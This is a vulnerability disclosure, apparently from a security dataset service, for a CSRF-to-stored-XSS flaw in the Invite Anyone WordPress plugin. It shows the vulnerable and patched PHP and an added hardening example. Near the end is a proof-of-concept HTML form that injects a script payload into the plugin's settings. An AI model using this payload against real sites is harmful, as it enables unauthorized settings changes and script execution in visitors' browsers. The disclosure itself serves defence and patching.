Cross-Site Request Forgery (CSRF)/Cross-Site Scripting (XSS) Vulnerability in Invite Anyone
At the beginning of the year we took a couple of actions to improve our inclusion of vulnerabilities where there has not been a report on the vulnerability released by the discoverer so that we could expand the number of vulnerabilities we include in our dataset. First, we expanded our monitoring of changes made to plugins to spot more of those situations. Second, we started releasing posts with the details of those vulnerabilities, which allows us to provide more information on the vulnerabilities to our customers than we otherwise could. That has also led to us spotting additional vulnerabilities in those plugins, just as we have when reviewing reports for other vulnerabilities.
While putting together a post on a vulnerability that had existed in the plugin Invite Anyone, we spotted another vulnerability, which in part involved a lack of protection against cross-site request forgery (CSRF). After noticing that, we did some more checking and found that there was also a CSRF vulnerability when saving the plugin’s settings page, which could be used to cause cross-site scripting (XSS) due to a lack of sanitization of the submitted settings. We notified the developer of those issues; they quickly got back to us and have now released version 1.3.16, which resolves the vulnerability.
Prior to 1.3.16 the plugin’s settings page included a nonce, which is used to prevent CSRF, but when the settings were saved there was no check to make sure a valid one was included. That occurred in the function invite_anyone_admin_panel in the file /admin/admin-panel.php.
In version 1.3.15 the code for saving starts running right after a check that a request to save the settings has been sent:

```php
if ( !empty( $_POST['invite-anyone-settings-submit'] ) ) {
	$options = invite_anyone_options();
```
In 1.3.16 the function check_admin_referer() is run to check if a valid nonce is included in the request before moving on:
```php
if ( !empty( $_POST['invite-anyone-settings-submit'] ) ) {
	check_admin_referer( 'invite_anyone-options' );
	$options = invite_anyone_options();
```
Also, as of 1.3.15 the function registered through register_setting() to sanitize the settings didn’t do any sanitization; it simply returned its input unchanged:

```php
function invite_anyone_settings_check($input) {
	return $input;
}
```
In 1.3.16 that function includes relevant sanitization for each of the settings.
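The following is an added example, not the plugin’s own code, showing how the two fixes fit together: the nonce check on the POST handler and a whitelisting sanitizer passed to register_setting(). The option name invite_anyone, the key default_invitation_subject and the nonce action invite_anyone-options come from this post; the other setting names and their types are assumptions for illustration.

```php
<?php
// Added example (not Invite Anyone's own code). Whitelisting sanitizer: only
// known keys survive, each run through a sanitizer suited to its type, so an
// attacker cannot smuggle in unexpected keys or raw HTML.
function example_invite_anyone_settings_check( $input ) {
	$clean = array();
	// Assumed schema: setting key => WordPress sanitizer. Only
	// default_invitation_subject is taken from the advisory.
	$schema = array(
		'default_invitation_subject' => 'sanitize_text_field',
		'default_invitation_message' => 'wp_kses_post', // assumed setting
		'max_invites'                => 'absint',       // assumed setting
	);
	foreach ( $schema as $key => $sanitizer ) {
		if ( isset( $input[ $key ] ) ) {
			$clean[ $key ] = call_user_func( $sanitizer, $input[ $key ] );
		}
	}
	return $clean; // unknown keys posted by an attacker are dropped here
}

// The third argument makes WordPress run the sanitizer every time the option
// is updated through the Settings API, not only from the plugin's own form.
add_action( 'admin_init', function () {
	register_setting( 'invite_anyone', 'invite_anyone', 'example_invite_anyone_settings_check' );
} );

// Handler for the plugin's own settings form. The order matters: capability
// check, then nonce check, then sanitize, then store.
function example_invite_anyone_save_settings() {
	if ( empty( $_POST['invite-anyone-settings-submit'] ) ) {
		return;
	}
	if ( ! current_user_can( 'manage_options' ) ) {
		wp_die( 'Insufficient permissions.' );
	}
	// Stops with an error page when the nonce is missing, expired or forged,
	// which is what closes the CSRF hole described above.
	check_admin_referer( 'invite_anyone-options' );
	$submitted = isset( $_POST['invite_anyone'] )
		? (array) wp_unslash( $_POST['invite_anyone'] )
		: array();
	update_option( 'invite_anyone', example_invite_anyone_settings_check( $submitted ) );
}
```

Input sanitization alone is not the whole defence: wherever the stored subject is printed on the Send Invites tab it should still be escaped with esc_html() or esc_attr() at output time.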
Proof of Concept
The following proof of concept will cause an alert box with any accessible cookies to be shown on the Send Invites tab of a user’s BuddyPress profile page, when submitted as an Administrator.
Make sure to replace “[path to WordPress]” with the location of WordPress.
```html
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=invite-anyone" method="POST">
<input type="hidden" name="invite_anyone[default_invitation_subject]" value="<script>alert(document.cookie);</script>">
<input type="submit" name="invite-anyone-settings-submit" value="Save Changes" />
</form>
</body>
</html>
```
Timeline
- March 20, 2017 – Developer notified.
- March 20, 2017 – Developer responds.
- March 22, 2017 – Version 1.3.16 released, which fixes vulnerability.